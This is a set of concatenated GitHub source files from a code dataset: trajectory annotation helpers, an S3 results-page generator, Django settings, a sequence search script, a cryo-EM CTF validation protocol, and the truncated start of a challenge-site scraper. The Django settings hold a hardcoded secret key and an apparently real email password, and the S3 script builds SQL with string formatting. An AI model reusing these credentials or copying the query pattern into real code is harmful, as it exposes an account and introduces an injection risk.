nSimu))\nfig.savefig(\"lhs_mc_mindist_%d.png\"%size)\nplt.close(fig)\n\npp.close()\n","repo_name":"jschueller/otlhs","sub_path":"validation/validate_MC_small.py","file_name":"validate_MC_small.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10454952133","text":"from __future__ import print_function, division, absolute_import\nfrom tracktable.core import geomath\nimport numpy\n\nfrom six.moves import range\n\nALL_ANNOTATIONS = {}\n\n# ----------------------------------------------------------------------\n\ndef climb_rate(trajectory, max_climb=2000):\n \"\"\"Annotate points in an AirTrajectory with climb rate\n\n usage: climb_rate(t: AirTrajectory) -> None\n\n This will add a property 'climb_rate' to each point in the input\n trajectory. 
This is measured in units per minute (note the division by 60 below) and is\n    computed as (points[n+1].altitude - points[n].altitude) divided by the\n    elapsed time between the two points in minutes.\n\n    Args:\n        trajectory (Trajectory): Trajectory to be annotated with climb rate\n\n    Keyword Args:\n        max_climb (int): max climb rate (Default: 2000)\n\n    Returns:\n        Trajectory annotated with climb rate\n\n    \"\"\"\n\n    if len(trajectory) == 0:\n        return\n    elif len(trajectory) == 1:\n        trajectory[0].properties['climb_rate'] = 0.0\n    else:\n        for i in range(len(trajectory) - 1):\n            if ('altitude' not in trajectory[i].properties or\n                'altitude' not in trajectory[i+1].properties):\n                altitude_delta = 0.0\n            else:\n                altitude_delta = trajectory[i+1].properties['altitude'] - trajectory[i].properties['altitude']\n            try:\n                time_delta = (trajectory[i+1].timestamp - trajectory[i].timestamp).total_seconds()\n            except IndexError:\n                time_delta = 1\n\n            if time_delta == 0:\n                time_delta = 1\n            climb_rate = float(altitude_delta) / (time_delta / 60.0)\n            trajectory[i].set_property('climb_rate', climb_rate)\n\n        trajectory[-1].set_property('climb_rate', trajectory[-2].properties['climb_rate'])\n\n    return trajectory\n\n# ----------------------------------------------------------------------\n\ndef get_climb_rate(trajectory, max_velocity=2000):\n    \"\"\"Return a vector of scalars for point-to-point climb rate\n\n    Args:\n        trajectory (Trajectory): Trajectory to be annotated with climb rate\n\n    Keyword Args:\n        max_velocity (int): max possible velocity to use when calculating climb rate (Default: 2000)\n\n    Returns:\n        A vector of scalars with point-to-point climb rates\n\n    \"\"\"\n\n    scalars = numpy.zeros(len(trajectory))\n\n    for i in range(len(trajectory)):\n        climb_rate = float(trajectory[i].property('climb_rate')) / max_velocity\n        if climb_rate < -1:\n            climb_rate = -1\n        if climb_rate > 1:\n            climb_rate = 1\n\n        value = 0.5 * ( climb_rate + 1 )\n        scalars[i] = value\n    return scalars\n\n# ----------------------------------------------------------------------\n\ndef get_airspeed(trajectory, min_speed=0, max_speed=980):\n    \"\"\"Return a vector of scalars for point-to-point speeds\n\n    This is a feature accessor that can be used to color a trajectory.\n    It will map the 'speed' property into a range from 0 to 1.\n\n    Args:\n        trajectory (Trajectory): Trajectory containing speeds\n\n    Keyword Args:\n        min_speed (float): Minimum speed in kilometers per hour. This will be mapped to the bottom of the scalar range and thus the bottom of the color map. Defaults to 0. (Default: 0)\n        max_speed (float): Maximum speed in kilometers per hour. This will be mapped to the top of the scalar range and thus the top of the color map. Defaults to 980 (0.8 Mach, a common maximum permitted speed for civilian airliners). (Default: 980)\n\n    Returns:\n        A vector of scalars that can be used as input to a colormap.\n\n    \"\"\"\n\n    return _get_scaled_speed(trajectory, min_speed=min_speed, max_speed=max_speed)\n\n# ----------------------------------------------------------------------\n\ndef get_speed_over_water(trajectory, min_speed=0, max_speed=60):\n    \"\"\"Return a vector of scalars for point-to-point speeds over water\n\n    This is a feature accessor that can be used to color a trajectory.\n    It will map the 'speed' property into a range from 0 to 1.\n\n    Args:\n        trajectory (Trajectory): Trajectory containing speeds\n\n    Keyword Args:\n        min_speed (float): Minimum speed in kilometers per hour. This will be mapped to the bottom of the scalar range and thus the bottom of the color map. Defaults to 0. 
(Default: 0)\n max_speed (float): Maximum speed in kilometers per hour. This will be mapped to the top of the scalar range and thus the top of the color map. Defaults to 60 km/h (32 knots, very fast for big ships but slower than the maximum speed of high-speed civilian ferries). (Default: 60)\n\n Returns:\n A vector of scalars that can be used as input to a colormap.\n\n \"\"\"\n\n return _get_scaled_speed(trajectory, min_speed=min_speed, max_speed=max_speed)\n\ndef get_speed(trajectory):\n \"\"\"Get the speed for a trajectory without any scaling.\n\n Args:\n trajectory (Trajectory): Trajectory containing speeds\n\n Returns:\n Numpy array containing the speed value for each point\n\n \"\"\"\n scalars = numpy.zeros(len(trajectory))\n for i in range(len(trajectory)):\n scalars[i] = trajectory[i].speed\n\n return scalars\n\n# ----------------------------------------------------------------------\n\ndef _get_scaled_speed(trajectory, min_speed, max_speed):\n \"\"\"Internal method used for get_airspeed and get_speed_over_water\n\n This is a feature accessor that can be used to color a trajectory.\n It will map the 'speed' property into a range from 0 to 1.\n\n Args:\n trajectory (Trajectory): Trajectory containing speeds\n min_speed (float): Minimum speed in kilometers per hour. No default.\n max_speed (float): Maximum speed in kilometers per hour. No default.\n\n Returns:\n A vector of scalars that can be used as input to a colormap.\n \"\"\"\n\n scalars = numpy.zeros(len(trajectory))\n for i in range(len(trajectory)):\n speed = trajectory[i].speed\n value = (speed - min_speed) / (max_speed - min_speed)\n scalars[i] = value\n\n return scalars\n\n# ----------------------------------------------------------------------\n\ndef get_progress(trajectory):\n \"\"\"Return a vector of scalars for point-to-point flight progress\n\n Args:\n trajectory (Trajectory): Trajectory containing flight progress\n\n Returns:\n A vector of scalars with point-to-point flight progress\n\n \"\"\"\n\n scalars = numpy.zeros(len(trajectory))\n\n for i in range(len(trajectory)):\n scalars[i] = trajectory[i].property(\"progress\")\n\n return scalars\n\n# ----------------------------------------------------------------------\n\ndef progress(trajectory):\n \"\"\"Annotate points in an AirTrajectory with flight progress\n\n usage: progress(t: AirTrajectory) -> None\n\n This will add a property \"progress\" to each point in the input\n trajectory. This property will be 0 at the first point, 1 at the\n last point, and spaced evenly in between.\n\n Args:\n trajectory (Trajectory): Trajectory to be annotated with flight progress\n\n Returns:\n Trajectory annotated with flight progress\n\n \"\"\"\n\n if len(trajectory) == 0:\n return trajectory\n else:\n trajectory[0].set_property('progress', 0.0)\n if len(trajectory) > 1:\n step = 1.0 / (len(trajectory) - 1)\n current_value = step\n for i in range(1, len(trajectory)):\n trajectory[i].set_property('progress', 1.0 * current_value)\n current_value += step\n\n return trajectory\n\n# ----------------------------------------------------------------------\n\ndef compute_speed_from_positions(trajectory):\n \"\"\"Annotate points in an Trajectory with point-to-point speeds\n\n This will add a property \"speed\" to each point in the input\n trajectory. 
The speed is computed from each pair of consecutive points; the last point\n    reuses the speed of its predecessor.\n\n    Args:\n        trajectory (Trajectory): Trajectory to be annotated with speeds\n\n    Returns:\n        Trajectory annotated with point-to-point speeds\n    \"\"\"\n\n    for i in range(len(trajectory) - 1):\n        speed_between_points = geomath.speed_between_points(trajectory[i], trajectory[i+1])\n        trajectory[i].speed = speed_between_points\n\n    if len(trajectory) > 1:\n        trajectory[-1].speed = trajectory[-2].speed\n    if len(trajectory) == 1:\n        trajectory[-1].speed = 0\n\n    return trajectory\n\n# ----------------------------------------------------------------------\n\ndef register_annotation(feature_name, compute_feature, retrieve_feature):\n    global ALL_ANNOTATIONS\n    ALL_ANNOTATIONS[feature_name] = [ compute_feature, retrieve_feature ]\n\n# ----------------------------------------------------------------------\n\ndef retrieve_feature_function(name):\n    \"\"\"Supply feature function\n\n    Args:\n        name (str): Name of feature\n\n    Returns:\n        Function related to the feature\n\n    \"\"\"\n\n    global ALL_ANNOTATIONS\n    return ALL_ANNOTATIONS[name][0]\n\ndef retrieve_feature_accessor(name):\n    \"\"\"Supply feature accessor\n\n    Args:\n        name (str): Name of feature\n\n    Returns:\n        Accessor related to the feature\n\n    \"\"\"\n\n    global ALL_ANNOTATIONS\n    return ALL_ANNOTATIONS[name][1]\n\ndef available_annotations():\n    \"\"\"Supply all available annotations\n\n    Returns:\n        All of the possible annotation types\n\n    \"\"\"\n\n    global ALL_ANNOTATIONS\n    return ALL_ANNOTATIONS.keys()\n\n\nregister_annotation('progress', progress, get_progress)\nregister_annotation('climb_rate', climb_rate, get_climb_rate)\nregister_annotation('airspeed', compute_speed_from_positions, get_airspeed)\nregister_annotation('speed_over_water', compute_speed_from_positions, get_speed_over_water)\nregister_annotation('speed', compute_speed_from_positions, get_speed)\n","repo_name":"sandialabs/tracktable","sub_path":"tracktable/Python/tracktable/feature/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":9758,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"22321010255","text":"#!/usr/bin/python\n\nimport MySQLdb\nimport json\nimport os\nimport boto3\nfrom jinja2 import Environment, FileSystemLoader\nimport ConfigParser\n\n\ndef write_results_file(league, cursor):\n    cursor.execute(\"\"\"\n        SELECT p.name, t.name, p.position, pw.price, pw.time\n        FROM players_won pw\n        JOIN players p\n        ON p.playerid=pw.playerid\n        JOIN teams t\n        ON pw.teamid=t.id \n        WHERE pw.leagueid = '{0}'\n        \"\"\".format(league['id']))\n\n    players = cursor.fetchall()\n\n    data = {'data': players}\n\n    data_dir = \"data/results\"\n    data_file = os.path.join(data_dir, \"{0}.json\".format(league['name']))\n\n    with open(data_file, 'w') as outfile:\n        json.dump(data, outfile)\n\n\ndef write_results_page(name, template):\n    with open(\"html/results/{0}.html\".format(name), 'w') as outfile:\n        outfile.write(template.render(league_name=name))\n\n\ndef write_contracts_file(league, cursor):\n    cursor.execute(\"\"\"\n        SELECT t.name, p.name, c.current_cost, c.years_left, c.broken\n        FROM contracts c\n        JOIN players p\n        ON p.playerid=c.playerid\n        JOIN teams t\n        ON c.ownerid=t.ownerid\n        AND c.leagueid=t.leagueid\n        WHERE c.leagueid = '{0}'\n        \"\"\".format(league['id']))\n\n    players = cursor.fetchall()\n\n    data = {'data': players}\n\n    data_dir = \"data/contracts\"\n    data_file = os.path.join(data_dir, \"{0}.json\".format(league['name']))\n\n    
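# Editor's note (assumption): the {'data': [...]} wrapper written here looks\n    # like the jQuery DataTables ajax payload shape used by the generated pages.\n    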
with open(data_file, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef write_contracts_page(name, template):\n with open(\"html/contracts/{0}.html\".format(name), 'w') as outfile:\n outfile.write(template.render(league_name=name))\n\n\n# Write a file to S3\ndef write_file(bucket, local_path, remote_path=''):\n\n if not remote_path:\n remote_path = local_path\n\n with open(local_path, 'r') as data:\n bucket.put_object(Key=remote_path, Body=data, ContentType='text/html')\n\n\nconfig = ConfigParser.ConfigParser()\nconfig.read('db.ini')\n\nsection = 'prod'\n\ndbconfig = {\n 'user': config.get(section, 'user'),\n 'passwd': config.get(section, 'password'),\n 'host': config.get(section, 'hostname'),\n 'port': config.getint(section, 'port'),\n 'db': config.get(section, 'schema'),\n 'charset': config.get(section, 'charset')\n}\n\ndb = MySQLdb.connect(**dbconfig)\n\ncursor = db.cursor()\n\ncursor.execute(\"SELECT id, name, sport FROM leagues\")\n\nleagues = {'baseball': [], 'football': []}\n\nfor row in cursor.fetchall():\n leagues[row[2]].append({'id': row[0], 'name': row[1]})\n\nenv = Environment(loader=FileSystemLoader('templates'))\nresults_template = env.get_template('results.html')\ncontracts_template = env.get_template('contracts.html')\n\nfor league in leagues['baseball']:\n write_results_file(league, cursor)\n write_results_page(league['name'], results_template)\n write_contracts_file(league, cursor)\n write_contracts_page(league['name'], contracts_template)\n\n\nfor league in leagues['football']:\n write_results_file(league, cursor)\n write_results_page(league['name'], results_template)\n write_contracts_file(league, cursor)\n write_contracts_page(league['name'], contracts_template)\n\ndb.close()\n\n\nindex_template = env.get_template('index.html')\n\nwith open('html/index.html', 'w') as outfile:\n outfile.write(index_template.render(leagues=leagues))\n\ns3 = boto3.resource('s3')\nbucket = s3.Bucket('twoguysandadream.com')\n\nwrite_file(bucket, os.path.join('html', 'index.html'), 'index.html')\n\nfor directory in ['data/results', 'html/results', 'data/contracts', 'html/contracts']:\n for file in os.listdir(directory):\n write_file(bucket, os.path.join(directory, file))\n","repo_name":"akeely/tgaad-draftresults","sub_path":"loadResults.py","file_name":"loadResults.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6539759510","text":"\"\"\"\nDjango settings for mysite project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nimport djcelery\ndjcelery.setup_loader()\nBROKER_URL = 'django://'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '(fv8g)z9^zqv$m%==93+_tjh&==m^isi-w502b1g5ws*t=_7)+'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 
'django.contrib.staticfiles',\n    'django.contrib.humanize',\n    'registration',\n    'novajoy'\n    # 'dashaFilms'\n    # 'djcelery',\n    # 'kombu.transport.django',\n)\nMIDDLEWARE_CLASSES = (\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    # 'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\n# SEND_ACTIVATION_EMAIL=False\nACCOUNT_ACTIVATION_DAYS = 3\nREGISTRATION_AUTO_LOGIN = True\nAUTH_USER_MODEL = 'novajoy.Account'\nROOT_URLCONF = 'mysite.urls'\n# NOTE: LANGUAGE_CODE and USE_I18N are defined once, in the\n# internationalization section below (duplicate early definitions removed)\nWSGI_APPLICATION = 'mysite.wsgi.application'\n\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = 'cska631@gmail.com'\nEMAIL_HOST_PASSWORD = 'Dodiplomanow!'\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n# Database\n\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.mysql',\n        'NAME': 'main',\n        'USER': 'root',\n        'PASSWORD': '',\n    }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\n# STATIC_URL = '/static/'\nTEMPLATE_DIRS = [os.path.join(BASE_DIR, 'novajoy/templates')]\n\n\n_PATH = os.path.abspath(os.path.dirname(__file__))\n\nMEDIA_ROOT = os.path.join(_PATH, 'files', 'media')\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = os.path.join(_PATH, 'files', 'static')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n    os.path.join(_PATH, 'static'),\n)\nSTATICFILES_FINDERS = (\n    'django.contrib.staticfiles.finders.FileSystemFinder',\n    'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n\n","repo_name":"VOVAN1993/mysite","sub_path":"mysite/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11841843500","text":"#!/usr/bin/env python\n\nfrom sequence import seq\n\nwhile True:\n    i_seq = input(\"Searching for : \")\n    if i_seq == \"XXX\":\n        print(\"Okay, I will stop.\")\n        break\n    elif i_seq.isdigit():\n        print(\"You should type an amino acid, not a number.\")\n        print(\"Please try again.\")\n        continue\n    else:\n        r_found = []  # reset the matches for each new search\n        i = 0  # set to 1 to start counting positions from 1\n        for f_seq in seq:\n            if f_seq == i_seq:\n                r_found.append(str(i + 1))\n            i += 1\n        print(\"Found at : %s\" % (\",\".join(r_found)))\n","repo_name":"joy-son/BI-practice","sub_path":"bioinfomatics_3_8.py","file_name":"bioinfomatics_3_8.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1307160748","text":"# **************************************************************************\n# *\n# * Authors:     Yunior C. 
Fonseca Reyna (cfonseca@cnb.csic.es)\n# *\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia, CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\nimport logging\nimport pyworkflow.protocol.params as params\nfrom pwem.protocols import EMProtocol\nfrom pyworkflow import BETA\nimport pyworkflow.object as pwobj\n\nfrom tomo.objects import SetOfCTFTomoSeries\n\nlogger = logging.getLogger(__name__)\n\nOUTPUT_BAD_CTF_SERIE = \"badCTFTomoSeries\"\nOUTPUT_GOOD_CTF_SERIE = \"goodCTFTomoSeries\"\n\n\nclass ProtCTFTomoSeriesValidate(EMProtocol):\n    \"\"\"\n    Validate a set of CTF tomo series and separate them into two sets (good\n    and bad tomo series)\n    \"\"\"\n    _label = 'ctf validate'\n    _devStatus = BETA\n\n    # -------------------------- DEFINE param functions -----------------------\n\n    def _defineParams(self, form):\n        \"\"\" Define the input parameters for this protocol in the given form. \"\"\"\n        form.addSection(label='Input')\n        form.addParam('inputCtfTomoSeries', params.PointerParam, important=True,\n                      pointerClass='SetOfCTFTomoSeries',\n                      label='Input ctf tomo series')\n\n        form.addSection(label='CTF validation')\n        form.addParam('validationType', params.EnumParam,\n                      display=params.EnumParam.DISPLAY_HLIST,\n                      choices=[\"Global\", \"Per tilt\"],\n                      label=\"Validation type\",\n                      default=0,\n                      help=\"Global mode: series with at least \"\n                           \"one image that does not satisfy the criteria are \"\n                           \"rejected \\n\"\n                           \"Per tilt mode: series containing a certain \"\n                           \"number of images that do not satisfy the \"\n                           \"criteria are rejected\")\n        form.addParam('numberImages', params.IntParam,\n                      label='Number of images to reject',\n                      condition='validationType==1', default=None,\n                      allowsNull=True,\n                      help=\"Number of failed images required to reject a \"\n                           \"ctf series\")\n        self.addCriteriaParams(form)\n\n    def addCriteriaParams(self, form):\n        form.addParam('defocusCriteria', params.EnumParam,\n                      display=params.EnumParam.DISPLAY_HLIST,\n                      choices=[\"Yes\", \"No\"],\n                      label=\"Defocus tolerance\",\n                      default=1, help=\"Validate the defocus deviation against \"\n                                      \"a threshold (tolerance) with respect \"\n                                      \"to an expected defocus value.\")\n        form.addParam('defocusValue', params.FloatParam,\n                      label='Expected value (Å)',\n                      condition='defocusCriteria==0', default=None,\n                      allowsNull=True,\n                      help=\"Expected defocus value in Å\")\n        form.addParam('defocusTolerance', params.FloatParam,\n                      label='Tolerance value (Å)',\n                      condition='defocusCriteria==0', default=None,\n                      allowsNull=True,\n                      help=\"Defocus tolerance value in Å\")\n\n        form.addParam('astigmatismCriteria', params.EnumParam,\n                      display=params.EnumParam.DISPLAY_HLIST,\n                      choices=[\"Yes\", \"No\"],\n                      label=\"Astigmatism\",\n                      default=1, help=\"Validate the astigmatism taking into \"\n                                      \"account a tolerance value.\")\n        form.addParam('astigmatismTolerance', params.FloatParam,\n                      label='Tolerance value',\n                      condition='astigmatismCriteria==0', default=1.1,\n                      help=\"Astigmatism tolerance value\")\n\n        form.addParam('resolutionCriteria', params.EnumParam,\n                      display=params.EnumParam.DISPLAY_HLIST,\n                      choices=[\"Yes\", \"No\"],\n                      label=\"Resolution\",\n                      default=1, help=\"Validate the resolution taking into \"\n                                      \"account an expected resolution.\")\n        form.addParam('resolutionTolerance', params.FloatParam,\n                      label='Expected value',\n                      allowsNull=True,\n                      condition='resolutionCriteria==0', default=None,\n                      help=\"Expected resolution value\")\n\n    def _insertAllSteps(self):\n        self._insertFunctionStep(self.ctfValidateStep)\n        self._insertFunctionStep(self.createOutputStep)\n\n    # ----------------------------STEPS --------------------------------------\n    def ctfValidateStep(self):\n        \"\"\"\n        Validate all ctf tomo series and separate them into two sets (good and\n        bad, following the selected criteria)\n        \"\"\"\n\n        self.goodCTFTomoSeries = None\n        self.badCTFTomoSeries = None\n        self.validateDict = {}\n        imagesToReject = 1  # Case of global validation type\n        ctfSeries = self.inputCtfTomoSeries.get()\n\n        if self.validationType.get() == 1:\n            imagesToReject = self.numberImages.get()\n\n        self.printTable(imagesToReject)\n        printStr = \"\"\n        for ctfSerie in ctfSeries:\n            newCTFTomoSeries = ctfSerie.clone()\n            ctfEstItems = []\n            failedDefocusCriteria = 0\n            failedAstigmatismCriteria = 0\n            failedResolutionCriteria = 0\n            for item in ctfSerie.iterItems():\n                ctfEstItem = item.clone()\n                ctfEstItems.append(ctfEstItem)\n\n            # Defocus deviation criteria\n            if self.defocusCriteria.get() == 0:\n                
failedDefocusCriteria = self._validateCtfDefocusDeviation(ctfEstItems,\n                                                                           self.defocusValue.get(),\n                                                                           self.defocusTolerance.get())\n\n            # Astigmatism criteria\n            if self.astigmatismCriteria.get() == 0:\n                failedAstigmatismCriteria = self._validateAstigmatism(ctfEstItems,\n                                                                      self.astigmatismTolerance.get())\n\n            # Resolution criteria\n            if self.resolutionCriteria.get() == 0:\n                # Some estimation methods don't calculate the resolution\n                if ctfEstItems[0].getResolution() is not None:\n                    failedResolutionCriteria = self._validateResolution(ctfEstItems,\n                                                                        self.resolutionTolerance.get())\n\n            validate = self.validateCtf(ctfEstItems,\n                                        imagesToReject=imagesToReject)\n\n            result = \"Pass\" if validate else \"Rejected\"\n            printStr += \"{0:25} {1:30} {2:30} {3:30} {4:^50}\".format(ctfSerie.getTsId(),\n                                                                     failedDefocusCriteria,\n                                                                     failedAstigmatismCriteria,\n                                                                     failedResolutionCriteria,\n                                                                     result)\n            printStr += \"\\n\"\n\n            if validate:\n                newCTFTomoSeries.setEnabled(True)\n                output = self.getOutputSetOfCTFTomoSeries(OUTPUT_GOOD_CTF_SERIE)\n                output.append(newCTFTomoSeries)\n            else:\n                newCTFTomoSeries.setEnabled(False)\n                output = self.getOutputSetOfCTFTomoSeries(OUTPUT_BAD_CTF_SERIE)\n                output.append(newCTFTomoSeries)\n\n            for ctfItem in ctfEstItems:\n                newCTFTomoSeries.append(ctfItem)\n\n        logger.info(printStr)\n\n    def createOutputStep(self):\n        if self.goodCTFTomoSeries is not None:\n            self.goodCTFTomoSeries.setStreamState(pwobj.Set.STREAM_CLOSED)\n            self.goodCTFTomoSeries.write()\n            self._store()\n        if self.badCTFTomoSeries is not None:\n            self.badCTFTomoSeries.setStreamState(pwobj.Set.STREAM_CLOSED)\n            self.badCTFTomoSeries.write()\n            self._store()\n\n    # --------------------------UTILS methods ----------------------------------\n    def _validateCtfDefocusDeviation(self, ctfEstItems, defocusValue, tolerance):\n        \"\"\"\n        Validate the set of ctf tomo series taking into account the defocus\n        deviation\n        \"\"\"\n        failedCTF = self.validateDefocusUDeviation(ctfEstItems, defocusValue,\n                                                   defocusUTolerance=tolerance)\n        failedCTF += self.validateDefocusVDeviation(ctfEstItems, defocusValue,\n                                                    defocusVTolerance=tolerance)\n        return failedCTF\n\n    def _validateAstigmatism(self, ctfEstItems, astigmatismTolerance):\n        \"\"\"\n        Validate the set of ctf tomo series taking into account the astigmatism\n        tolerance:\n        the _objEnable property is set to True if the astigmatism is in range\n        and False otherwise, on each ctf item\n        \"\"\"\n        failedCTF = 0\n        for ctfTomo in ctfEstItems:\n            isAstigmatismInRange = ctfTomo.getDefocusAngle() < astigmatismTolerance\n            if not isAstigmatismInRange:\n                failedCTF += 1\n            ctfTomo.setEnabled(isAstigmatismInRange)\n        return failedCTF\n\n    def _validateResolution(self, ctfEstItems, resolutionTolerance):\n        failedCTF = 0\n        for ctfTomo in ctfEstItems:\n            isResolutionInRange = ctfTomo.getResolution() < resolutionTolerance\n            if not isResolutionInRange:\n                failedCTF += 1\n            ctfTomo.setEnabled(isResolutionInRange)\n        return failedCTF\n\n    @staticmethod\n    def validateCtf(ctfItemsList, imagesToReject=1):\n        \"\"\"\n        Validate the ctf tomo series: return False as soon as `imagesToReject`\n        images are marked as disabled, True otherwise\n        \"\"\"\n        count = 0\n        for ctfItem in ctfItemsList:\n            if not ctfItem.isEnabled():\n                count += 1\n                if count == imagesToReject:\n                    return False\n        return True\n\n    def validateDefocusVDeviation(self, ctfTomoItems, defocusVValue, defocusVTolerance=20):\n        \"\"\"\n        Set _objEnable property as True if the deviation is in range or False\n        in other case, in each ctfTomoItems\n        \"\"\"\n        failedCTF = 0\n        for ctfTomo in 
ctfTomoItems:\n defocusVdeviation = abs(ctfTomo.getDefocusV() - defocusVValue)\n isDefocusVDeviationInRange = True if defocusVdeviation < defocusVTolerance else False\n if not isDefocusVDeviationInRange and ctfTomo.isEnabled():\n failedCTF += 1\n ctfTomo.setEnabled(isDefocusVDeviationInRange)\n return failedCTF\n\n def validateDefocusUDeviation(self, ctfTomoItems, defocusUValue, defocusUTolerance=20):\n \"\"\"\n Set _objEnable property as True if the deviation is in range or False\n in other case, in each ctfTomoItems\n \"\"\"\n failedCTF = 0\n for ctfTomo in ctfTomoItems:\n defocusUdeviation = abs(ctfTomo.getDefocusU() - defocusUValue)\n isDefocusUDeviationInRange = True if defocusUdeviation < defocusUTolerance else False\n if not isDefocusUDeviationInRange and ctfTomo.isEnabled():\n failedCTF += 1\n ctfTomo.setEnabled(isDefocusUDeviationInRange)\n return failedCTF\n\n def _getSetOfTiltSeries(self, pointer=False):\n return self.inputCtfTomoSeries.get().getSetOfTiltSeries(pointer=pointer)\n\n def getOutputSetOfCTFTomoSeries(self, outputSetName):\n outputSetOfCTFTomoSeries = getattr(self, outputSetName, None)\n\n if outputSetOfCTFTomoSeries:\n outputSetOfCTFTomoSeries.enableAppend()\n else:\n outputSetOfCTFTomoSeries = SetOfCTFTomoSeries.create(self._getPath(),\n prefix=outputSetName)\n outputSetOfCTFTomoSeries.setSetOfTiltSeries(self._getSetOfTiltSeries())\n outputSetOfCTFTomoSeries.setStreamState(pwobj.Set.STREAM_OPEN)\n self._defineOutputs(**{outputSetName: outputSetOfCTFTomoSeries})\n\n return outputSetOfCTFTomoSeries\n\n def allowsDelete(self, obj):\n return True\n\n def _validate(self):\n return []\n\n def _summary(self):\n summary = []\n if hasattr(self, 'goodCTFTomoSeries'):\n summary.append(\"Number of good ctf series: %d.\" % (self.goodCTFTomoSeries.getSize()))\n if hasattr(self, 'badCTFTomoSeries'):\n summary.append(\"Number of bad ctf series: %d.\" % (self.badCTFTomoSeries.getSize()))\n\n return summary\n\n def printTable(self, imagesToReject):\n printStr = \"\\n-------------------------------------------------------\\n\"\n printStr += \"Number of failed images to reject: %s\\n\" % imagesToReject\n printStr += '--------------------------------------------------------\\n'\n printStr += \"{0:35} {1:25} {2:25} {3:25} {4:20}\".format('CTFTomoSerie',\n 'Defocus tolerance',\n 'Astigmatism',\n 'Resolution',\n 'Validate').ljust(5, ' ')\n printStr += \"\\n\"\n printStr += '------------------------' * 7\n\n logger.info(printStr)\n","repo_name":"scipion-em/scipion-em-tomo","sub_path":"tomo/protocols/protocol_ctf_validate.py","file_name":"protocol_ctf_validate.py","file_ext":"py","file_size_in_byte":14719,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"18796523770","text":"import time\nimport base64\nimport requests\n\n\n# window._signature = btoa(Date.now()) Date.now() = 1667954735995\nurl = 'http://spider.wangluozhe.com/challenge/api/9'\nheaders = {\n # 'Host': 'spider.wangluozhe.com',\n # 'Connection': 'keep-alive',\n # 'Content-Length': '51',\n # 'Accept': 'application/json, text/javascript, */*; q=0.01',\n # 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',\n # 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n # 'Origin': 'http://spider.wangluozhe.com',\n # 'Accept-Encoding': 'gzip, deflate',\n # 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cookie': 
